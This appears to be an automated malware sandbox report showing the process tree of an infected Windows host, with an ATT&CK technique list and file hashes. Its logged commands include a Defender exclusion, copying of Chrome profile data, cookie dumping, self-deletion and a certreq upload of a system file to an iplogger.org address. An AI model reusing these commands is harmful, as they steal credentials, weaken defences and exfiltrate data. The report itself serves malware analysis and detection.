C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5524
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7924
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8640
-
C:\Users\Admin\AppData\Local\Temp\ACF.exeC:\Users\Admin\AppData\Local\Temp\ACF.exe1⤵PID:9092
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\ee8ba36a-c091-4882-945d-dee5b7c03682" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:8456
-
-
C:\Users\Admin\AppData\Local\Temp\ACF.exe"C:\Users\Admin\AppData\Local\Temp\ACF.exe" --Admin IsNotAutoStart IsNotTask2⤵PID:7752
-
C:\Users\Admin\AppData\Local\0036527b-9dc8-4e73-ba16-756f72651ab5\updatewin1.exe"C:\Users\Admin\AppData\Local\0036527b-9dc8-4e73-ba16-756f72651ab5\updatewin1.exe"3⤵PID:6356
-
-
C:\Users\Admin\AppData\Local\0036527b-9dc8-4e73-ba16-756f72651ab5\updatewin2.exe"C:\Users\Admin\AppData\Local\0036527b-9dc8-4e73-ba16-756f72651ab5\updatewin2.exe"3⤵PID:8936
-
-
C:\Users\Admin\AppData\Local\0036527b-9dc8-4e73-ba16-756f72651ab5\updatewin.exe"C:\Users\Admin\AppData\Local\0036527b-9dc8-4e73-ba16-756f72651ab5\updatewin.exe"3⤵PID:8420
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\0036527b-9dc8-4e73-ba16-756f72651ab5\updatewin.exe4⤵PID:9016
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
PID:6148
-
-
-
-
C:\Users\Admin\AppData\Local\0036527b-9dc8-4e73-ba16-756f72651ab5\5.exe"C:\Users\Admin\AppData\Local\0036527b-9dc8-4e73-ba16-756f72651ab5\5.exe"3⤵PID:8312
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\0036527b-9dc8-4e73-ba16-756f72651ab5\5.exe" & del C:\ProgramData\*.dll & exit4⤵PID:2304
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5.exe /f5⤵
- Kills process with taskkill
PID:9224
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:8272
-
-
-
-
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:9124
-
C:\Users\Admin\AppData\Local\Temp\1928.exeC:\Users\Admin\AppData\Local\Temp\1928.exe1⤵PID:9140
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo MFbR2⤵PID:4728
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Declinante.html2⤵PID:8424
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:8580
-
-
-
C:\Users\Admin\AppData\Local\Temp\2C53.exeC:\Users\Admin\AppData\Local\Temp\2C53.exe1⤵PID:8400
-
C:\Users\Admin\AppData\Local\Temp\329E.exeC:\Users\Admin\AppData\Local\Temp\329E.exe1⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\45D8.exeC:\Users\Admin\AppData\Local\Temp\45D8.exe1⤵PID:8512
-
C:\Users\Admin\AppData\Local\Temp\4A3E.exeC:\Users\Admin\AppData\Local\Temp\4A3E.exe1⤵PID:6532
-
C:\Users\Admin\AppData\Local\Temp\4A3E.exeC:\Users\Admin\AppData\Local\Temp\4A3E.exe2⤵PID:8484
-
-
C:\Users\Admin\AppData\Local\Temp\53B5.exeC:\Users\Admin\AppData\Local\Temp\53B5.exe1⤵PID:6596
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:8928
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:6380
-
-
C:\Users\Admin\AppData\Local\Temp\63F3.exeC:\Users\Admin\AppData\Local\Temp\63F3.exe1⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\63F3.exe"C:\Users\Admin\AppData\Local\Temp\63F3.exe"2⤵PID:9852
-
-
C:\Users\Admin\AppData\Local\Temp\6B66.exeC:\Users\Admin\AppData\Local\Temp\6B66.exe1⤵PID:8748
-
C:\Users\Admin\AppData\Local\Temp\is-H2I21.tmp\6B66.tmp"C:\Users\Admin\AppData\Local\Temp\is-H2I21.tmp\6B66.tmp" /SL5="$100752,330470,246784,C:\Users\Admin\AppData\Local\Temp\6B66.exe"2⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\is-GCFA0.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-GCFA0.tmp\kkkk.exe" /S /UID=lab2123⤵PID:4280
-
C:\Program Files\Windows Photo Viewer\EBYUEPQZQF\prolab.exe"C:\Program Files\Windows Photo Viewer\EBYUEPQZQF\prolab.exe" /VERYSILENT4⤵PID:5772
-
C:\Users\Admin\AppData\Local\Temp\is-38J3C.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-38J3C.tmp\prolab.tmp" /SL5="$20772,575243,216576,C:\Program Files\Windows Photo Viewer\EBYUEPQZQF\prolab.exe" /VERYSILENT5⤵PID:8976
-
-
-
C:\Users\Admin\AppData\Local\Temp\56-f12c0-fdd-b32a3-bbc583e239110\Tydojifuqae.exe"C:\Users\Admin\AppData\Local\Temp\56-f12c0-fdd-b32a3-bbc583e239110\Tydojifuqae.exe"4⤵PID:8656
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sz4o4dsc.egb\lod.exe & exit5⤵PID:8180
-
C:\Users\Admin\AppData\Local\Temp\sz4o4dsc.egb\lod.exeC:\Users\Admin\AppData\Local\Temp\sz4o4dsc.egb\lod.exe6⤵PID:5532
-
C:\ProgramData\77ESgb5Vm5jAwXHdGuxgUcKzR.tmpC:\ProgramData\77ESgb5Vm5jAwXHdGuxgUcKzR.tmp7⤵PID:9312
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"8⤵PID:5200
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zcujafdr.jns\privacytools5.exe & exit5⤵PID:9808
-
C:\Users\Admin\AppData\Local\Temp\zcujafdr.jns\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\zcujafdr.jns\privacytools5.exe6⤵PID:7416
-
C:\Users\Admin\AppData\Local\Temp\zcujafdr.jns\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\zcujafdr.jns\privacytools5.exe7⤵PID:9064
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xtynyziv.c24\app.exe /8-2222 & exit5⤵PID:7464
-
C:\Users\Admin\AppData\Local\Temp\xtynyziv.c24\app.exeC:\Users\Admin\AppData\Local\Temp\xtynyziv.c24\app.exe /8-22226⤵PID:9320
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\App Deploy"7⤵PID:9400
-
-
C:\Program Files (x86)\App Deploy\7za.exe"C:\Program Files (x86)\App Deploy\7za.exe" e -p31337 winamp-plugins.7z7⤵PID:9656
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\App Deploy\app.exe" -map "C:\Program Files (x86)\App Deploy\WinmonProcessMonitor.sys""7⤵PID:10528
-
C:\Program Files (x86)\App Deploy\app.exe"C:\Program Files (x86)\App Deploy\app.exe" -map "C:\Program Files (x86)\App Deploy\WinmonProcessMonitor.sys"8⤵PID:11096
-
-
-
C:\Program Files (x86)\App Deploy\7za.exe"C:\Program Files (x86)\App Deploy\7za.exe" e -p31337 winamp.7z7⤵PID:7584
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\azukfw1k.5ub\MultitimerFour.exe & exit5⤵PID:788
-
C:\Users\Admin\AppData\Local\Temp\azukfw1k.5ub\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\azukfw1k.5ub\MultitimerFour.exe6⤵PID:9440
-
C:\Users\Admin\AppData\Local\Temp\3X40KHHZTB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\3X40KHHZTB\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1047⤵PID:9860
-
C:\Users\Admin\AppData\Local\Temp\3X40KHHZTB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\3X40KHHZTB\multitimer.exe" 1 3.1614922182.6041c1c640758 1048⤵PID:8596
-
C:\Users\Admin\AppData\Local\Temp\3X40KHHZTB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\3X40KHHZTB\multitimer.exe" 2 3.1614922182.6041c1c6407589⤵PID:7528
-
C:\Users\Admin\AppData\Local\Temp\eqwju33j1u5\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\eqwju33j1u5\Setup3310.exe" /Verysilent /subid=57710⤵PID:10076
-
C:\Users\Admin\AppData\Local\Temp\is-PVS89.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-PVS89.tmp\Setup3310.tmp" /SL5="$60766,802346,56832,C:\Users\Admin\AppData\Local\Temp\eqwju33j1u5\Setup3310.exe" /Verysilent /subid=57711⤵PID:10112
-
C:\Users\Admin\AppData\Local\Temp\is-5AVRB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5AVRB.tmp\Setup.exe" /Verysilent12⤵PID:10056
-
C:\Users\Admin\AppData\Local\Temp\is-L1EAO.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-L1EAO.tmp\Setup.tmp" /SL5="$3083E,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-5AVRB.tmp\Setup.exe" /Verysilent13⤵PID:7256
-
C:\Users\Admin\AppData\Local\Temp\is-3BOER.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-3BOER.tmp\ProPlugin.exe" /Verysilent14⤵PID:9308
-
C:\Users\Admin\AppData\Local\Temp\is-TBL8T.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-TBL8T.tmp\ProPlugin.tmp" /SL5="$508EE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-3BOER.tmp\ProPlugin.exe" /Verysilent15⤵PID:10324
-
C:\Users\Admin\AppData\Local\Temp\is-LU7FT.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-LU7FT.tmp\Setup.exe"16⤵PID:7340
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"17⤵PID:10104
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\o4okzuqwjnm\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\o4okzuqwjnm\askinstall24.exe"10⤵PID:10008
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe11⤵PID:7564
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe12⤵
- Kills process with taskkill
PID:4772
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y11⤵PID:9468
-
-
-
C:\Users\Admin\AppData\Local\Temp\22ycyrgkq0q\vict.exe"C:\Users\Admin\AppData\Local\Temp\22ycyrgkq0q\vict.exe" /VERYSILENT /id=53510⤵PID:10024
-
C:\Users\Admin\AppData\Local\Temp\is-BOVC1.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-BOVC1.tmp\vict.tmp" /SL5="$107BE,870426,780800,C:\Users\Admin\AppData\Local\Temp\22ycyrgkq0q\vict.exe" /VERYSILENT /id=53511⤵PID:10200
-
C:\Users\Admin\AppData\Local\Temp\is-BRE9V.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-BRE9V.tmp\wimapi.exe" 53512⤵PID:9960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gsidxkx4k12\safebits.exe"C:\Users\Admin\AppData\Local\Temp\gsidxkx4k12\safebits.exe" /S /pubid=1 /subid=45110⤵PID:9720
-
-
C:\Users\Admin\AppData\Local\Temp\zdjs5iu1ivx\4w3wksj1vmr.exe"C:\Users\Admin\AppData\Local\Temp\zdjs5iu1ivx\4w3wksj1vmr.exe" /ustwo INSTALL10⤵PID:10136
-
-
C:\Users\Admin\AppData\Local\Temp\sap0lq153cm\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\sap0lq153cm\chashepro3.exe" /VERYSILENT10⤵PID:10152
-
C:\Users\Admin\AppData\Local\Temp\is-1ARI9.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-1ARI9.tmp\chashepro3.tmp" /SL5="$107C0,1446038,58368,C:\Users\Admin\AppData\Local\Temp\sap0lq153cm\chashepro3.exe" /VERYSILENT11⤵PID:9884
-
C:\Program Files (x86)\JCleaner\whiterauf.exe"C:\Program Files (x86)\JCleaner\whiterauf.exe"12⤵PID:8364
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"12⤵PID:3452
-
-
C:\Program Files (x86)\JCleaner\Abbas.exe"C:\Program Files (x86)\JCleaner\Abbas.exe"12⤵PID:7588
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"12⤵PID:3388
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"12⤵PID:944
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\212⤵PID:7164
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\213⤵PID:8880
-
-
-
C:\Program Files (x86)\JCleaner\5.exe"C:\Program Files (x86)\JCleaner\5.exe"12⤵PID:6160
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7E91.exeC:\Users\Admin\AppData\Local\Temp\7E91.exe1⤵PID:8016
-
C:\Users\Admin\AppData\Local\Temp\9297.exeC:\Users\Admin\AppData\Local\Temp\9297.exe1⤵PID:7576
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:8752
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
PID:9104
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\izsghhjjjs99\" /s /e /y2⤵PID:8356
-
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:9340
-
C:\Users\Admin\AppData\Local\Temp\5C51.tmp.exeC:\Users\Admin\AppData\Local\Temp\5C51.tmp.exe1⤵PID:9520
-
C:\Users\Admin\AppData\Local\Temp\5F11.tmp.exeC:\Users\Admin\AppData\Local\Temp\5F11.tmp.exe1⤵PID:9640
-
C:\Users\Admin\AppData\Local\Temp\74AD.tmp.exeC:\Users\Admin\AppData\Local\Temp\74AD.tmp.exe1⤵PID:8796
-
C:\Users\Admin\AppData\Local\Temp\7F5C.tmp.exeC:\Users\Admin\AppData\Local\Temp\7F5C.tmp.exe1⤵PID:3536
-
C:\Users\Admin\AppData\Local\Temp\8876.tmp.exeC:\Users\Admin\AppData\Local\Temp\8876.tmp.exe1⤵PID:9612
-
C:\Users\Admin\AppData\Local\Temp\AE8D.tmp.exeC:\Users\Admin\AppData\Local\Temp\AE8D.tmp.exe1⤵PID:10156
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 12⤵PID:5708
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:7288
-
-
-
C:\Users\Admin\AppData\Local\Temp\D947.tmp.exeC:\Users\Admin\AppData\Local\Temp\D947.tmp.exe1⤵PID:5492
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6800
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9308
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9632
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8268
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7896
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6572
-
C:\Users\Admin\AppData\Local\Temp\249A.exeC:\Users\Admin\AppData\Local\Temp\249A.exe1⤵PID:10416
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"1⤵PID:10292
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5868
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:7828
-
C:\Users\Admin\AppData\Local\Temp\857.exeC:\Users\Admin\AppData\Local\Temp\857.exe1⤵PID:9452
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9712
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7640
-
C:\Users\Admin\AppData\Local\Temp\5B5B.exeC:\Users\Admin\AppData\Local\Temp\5B5B.exe1⤵PID:10956
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:11160
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:9780
-
C:\Users\Admin\AppData\Local\Temp\9894.exeC:\Users\Admin\AppData\Local\Temp\9894.exe1⤵PID:5316
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:10360
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
2File and Directory Permissions Modification
1Impair Defenses
1Install Root Certificate
1Modify Registry
5Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
f7a040bef124bb5716718b77c788cbf4
SHA10ad2f39ab5786a0c918b70cd0ed5c97ffb828a18
SHA2562b33279027a6c62d717f3c2875bbc7fcc323801265baadca4fa0fba619b677ea
SHA512bb5af9692c5ca5bc76dd987ab15280cfec7ed05cfce5d8add4ae3b68f77e516b3cd8fb3ae02cdbeae62cb6a1db4c9b25e462f8f9c16e95daa50a6001d125a7f8
-
MD5
f7a040bef124bb5716718b77c788cbf4
SHA10ad2f39ab5786a0c918b70cd0ed5c97ffb828a18
SHA2562b33279027a6c62d717f3c2875bbc7fcc323801265baadca4fa0fba619b677ea
SHA512bb5af9692c5ca5bc76dd987ab15280cfec7ed05cfce5d8add4ae3b68f77e516b3cd8fb3ae02cdbeae62cb6a1db4c9b25e462f8f9c16e95daa50a6001d125a7f8
-
MD5
683fff250bb0dc3d212627180ddcf0eb
SHA13a6c5bc263051d9a3f850d12af7512fdcedc152c
SHA256995cfff4a497f71432a8eb8e404d67dddaff8d0ab8096df3aa7244cfc94c5bfa
SHA512a5392bcf296a6f1b7bc7f4f39d7d9a5a1c33581c95cfd1e58481700201a159c8e7127901317b7873b5b1f75889d1dabc82c03d32abd75ca4c512317dff100a65
-
MD5
683fff250bb0dc3d212627180ddcf0eb
SHA13a6c5bc263051d9a3f850d12af7512fdcedc152c
SHA256995cfff4a497f71432a8eb8e404d67dddaff8d0ab8096df3aa7244cfc94c5bfa
SHA512a5392bcf296a6f1b7bc7f4f39d7d9a5a1c33581c95cfd1e58481700201a159c8e7127901317b7873b5b1f75889d1dabc82c03d32abd75ca4c512317dff100a65
-
MD5
c8b823fdc17fcdf55b8c57b9d4665b92
SHA1de85eb77cad16d74345e7ebb0fa6e3fd8bd87406
SHA256088eb981b3cf7e48d7c5473255b5f4adf3d1ce98ab8446e13d4f7e222ec5e436
SHA51206630cf974b8c2b481df91b4c197aee5bcc42462c5f0f57a572f810aaf78a86423a47a3601abdde418365b28d8a8315ee14c3edbcc71cf46c7c05175fd145d05
-
MD5
c8b823fdc17fcdf55b8c57b9d4665b92
SHA1de85eb77cad16d74345e7ebb0fa6e3fd8bd87406
SHA256088eb981b3cf7e48d7c5473255b5f4adf3d1ce98ab8446e13d4f7e222ec5e436
SHA51206630cf974b8c2b481df91b4c197aee5bcc42462c5f0f57a572f810aaf78a86423a47a3601abdde418365b28d8a8315ee14c3edbcc71cf46c7c05175fd145d05
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
MD5123d599c3e6c78968ed0739ff7345bd0
SHA16e0bff323e852ae713ceb7f6f758635e86678387
SHA256926215bf0d3fb87b3a47d6c7fe020abc85eae3e86ab6fc1c19cd2c4a94370d87
SHA512bcee13bb7ef44ee1a0bb20365107e577a842a0eafc7664080142f423f17b5a8fd18b3784446843c47677a7fd4e03df40822602d472e15455e02aa39a152363e6
-
MD5
64fe3e4d13b33997a82861174fa02aec
SHA1e423e13d33172a2d885df8ef6f935981ba5cbdb6
SHA256ae969865e131fe3e5aa8278905d1c389fb9730e28f9b97e3382d6a81bbb5e051
SHA512bac5ab8349e4e942be4ecc31349f6c9f90dd9e8486d75d68a15abfa69cf006f2e2d5b5907023fcfd2f4b6c750fd934960240e5929bfdf1386bc7d82978c0edc7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5cc891b6819a20fab9896a0124f9ff0cd
SHA1483519d8905cb4468b5e3f5e69b95bce4ea6968a
SHA25685c99131f671c26c64f6db599ae995a263a238d41171149f679acabe0cc97d6f
SHA5127fd931f17876951a5f106a149e69abfac8e5fb11c3a4187f74d11abb9de0552881fa046ea731edc4d920f429e7af664835d7c649e1814874b54c79dd79209f56
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
MD58a5014567317cb0b3b33711278473ac3
SHA155b32f832f69556588b568cbc6b967be96aeb6f5
SHA2567c9ceda6a00bf7defac1c99d6ca6fa972cf1810b870b8ac5cfbc042a61775de8
SHA51246daa6672021339513f7d85cf19349ec26b02986007b7aa2a675a1604af1e4109b82a68de3d87a153eeb22b52b173ec1693ff19d7d24b27d0cbd104f862ec2c4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
MD52fe99eec9cbdf4ac3195628a5a1b4626
SHA10e1199d5f5912bfe9d7ee74fbda7942ebee9a8c2
SHA256ce091e4fac765b63bcd0902f50cd60f63625f588f8d89a229dfa2cd4f7af6fa9
SHA5121a2bc4f680d4f9827a451cb2ced1b260e43302d776a6ef5e4bc9803014f98787290007cf71da72fef7ea24d2f6ca52c8aa4dae1dd2b92c59aeb8389625eeab9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5b853e12e567f119c5ca52c009cf8e82c
SHA187d7e1f8477a0736b3a73908ea8a45b98005d6fb
SHA256759ea90f4ffbc40b1b9af26a19ec9f888e5f9c49944491764bd57025c393f7fc
SHA512b5d90df15d15c1002d396f26865fe360e6d60fd2009336d2633273112545e6e9d028615f572782e00d259861a7c753d6fe00ebe84cd2dc8382d2d42e5c7c84f5
-
MD5
fa65eca2a4aba58889fe1ec275a058a8
SHA10ecb3c6e40de54509d93570e58e849e71194557a
SHA25695e69d66188dd8287589817851941e167b0193638f4a7225c73ffbd3913c0c2e
SHA512916899c5bfc2d1bef93ab0bf80a7db44b59a132c64fa4d6ab3f7d786ad857b747017aab4060e5a9a77775587700b2ac597c842230172a97544d82521bfc36dff
-
MD5
8ce2502d0716db64fbe75ae82adc6e91
SHA1557e92b206cb870c106c83f49fca2b92b43dce6a
SHA256607a1c1a96157a161066544ecadd8918acbf103901ead9e69b5727aa3a675854
SHA5128ccddcd0b13f3ab1b9ef1d804e300cea5ce4ea0d6d79ac6940e54781283aef43352ba8fca896071f6b0939dd4ab176c71b5e95def99118f4d566d91e2345c930
-
MD5
afd51e2ff7beac4d0c88d8f872d6d0d5
SHA1185fd4793db912410de63ac7a5a3b1ac9c266b38
SHA256cecdc8bd4344647b2182696cf04e1db4fbb29aee6b46811999008901910b5c19
SHA512eed33fd55a82fceea21f522a6c59d3e318d7e73c86e9b1f039e37b3ccd6c0b58df24dabfcb71d8ccb818dd236cc329804d6a947240619ad26aed8713fe19a418
-
MD5
afd51e2ff7beac4d0c88d8f872d6d0d5
SHA1185fd4793db912410de63ac7a5a3b1ac9c266b38
SHA256cecdc8bd4344647b2182696cf04e1db4fbb29aee6b46811999008901910b5c19
SHA512eed33fd55a82fceea21f522a6c59d3e318d7e73c86e9b1f039e37b3ccd6c0b58df24dabfcb71d8ccb818dd236cc329804d6a947240619ad26aed8713fe19a418
-
MD5
afd51e2ff7beac4d0c88d8f872d6d0d5
SHA1185fd4793db912410de63ac7a5a3b1ac9c266b38
SHA256cecdc8bd4344647b2182696cf04e1db4fbb29aee6b46811999008901910b5c19
SHA512eed33fd55a82fceea21f522a6c59d3e318d7e73c86e9b1f039e37b3ccd6c0b58df24dabfcb71d8ccb818dd236cc329804d6a947240619ad26aed8713fe19a418
-
MD5
84878b1a26f8544bda4e069320ad8e7d
SHA151c6ee244f5f2fa35b563bffb91e37da848a759c
SHA256809aab5eace34dfbfb2b3d45462d42b34fcb95b415201d0d625414b56e437444
SHA5124742b84826961f590e0a2d6cc85a60b59ca4d300c58be5d0c33eb2315cefaf5627ae5ed908233ad51e188ce53ca861cf5cf8c1aa2620dc2667f83f98e627b549
-
MD5
0af0920310225c47eb504c811ada9554
SHA119cca7f8cf678c4516a4edee01774133445f9e27
SHA256b65bbacc41547f79c2a9ccbde9226df6853e5c70a7314cafafeb2dbd9a3761ee
SHA51260df59aa0d3f20e817cdc6dd1b2d74a2343e892304dc474096e24e479527de3ef4d1fe5fe6179deed2e3b3d1212acc93c6a2d800dd73e765ff4eea26ac2cde2a
-
MD5
0af0920310225c47eb504c811ada9554
SHA119cca7f8cf678c4516a4edee01774133445f9e27
SHA256b65bbacc41547f79c2a9ccbde9226df6853e5c70a7314cafafeb2dbd9a3761ee
SHA51260df59aa0d3f20e817cdc6dd1b2d74a2343e892304dc474096e24e479527de3ef4d1fe5fe6179deed2e3b3d1212acc93c6a2d800dd73e765ff4eea26ac2cde2a
-
MD5
0af0920310225c47eb504c811ada9554
SHA119cca7f8cf678c4516a4edee01774133445f9e27
SHA256b65bbacc41547f79c2a9ccbde9226df6853e5c70a7314cafafeb2dbd9a3761ee
SHA51260df59aa0d3f20e817cdc6dd1b2d74a2343e892304dc474096e24e479527de3ef4d1fe5fe6179deed2e3b3d1212acc93c6a2d800dd73e765ff4eea26ac2cde2a
-
MD5
0af0920310225c47eb504c811ada9554
SHA119cca7f8cf678c4516a4edee01774133445f9e27
SHA256b65bbacc41547f79c2a9ccbde9226df6853e5c70a7314cafafeb2dbd9a3761ee
